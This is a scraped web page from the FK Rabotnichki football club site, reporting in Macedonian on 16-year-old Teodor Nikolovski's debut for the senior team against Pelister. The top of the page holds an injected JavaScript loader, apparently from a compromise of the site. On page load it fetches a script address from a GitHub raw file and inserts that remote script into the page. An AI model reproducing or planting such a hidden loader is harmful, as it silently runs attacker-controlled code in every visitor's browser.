;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Новиот мегаталент на Работнички дебитираше за сениорскиот тим
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Новиот мегаталент на Работнички дебитираше за сениорскиот тим

Работнички оствари важна победа (0-2) против Пелистер на почетокот на пролетниот дел од сезоната и промовираше талент од новата генерација. Суперталентираниот Теодор Николовски доби шанса да дебитира во сениорскиот тим со 16 години и три месеци. Нема сомнение дека пред него е блескава фудбалска иднина и ќе тргне по стапките на Елиф Елмас и на Лука Станковски.

Николовски е играч од средниот ред и речиси цела година тренира со првиот тим на Работнички, но досега немаше право за настап за сениорскиот состав со оглед на возраста. Откако наполни 16 години и се наметна кај шефот на стручниот штаб Борче Христов на подготовките во Анталија, тој доби шанса за деби веќе на првиот пролетен натпревар против Пелистер.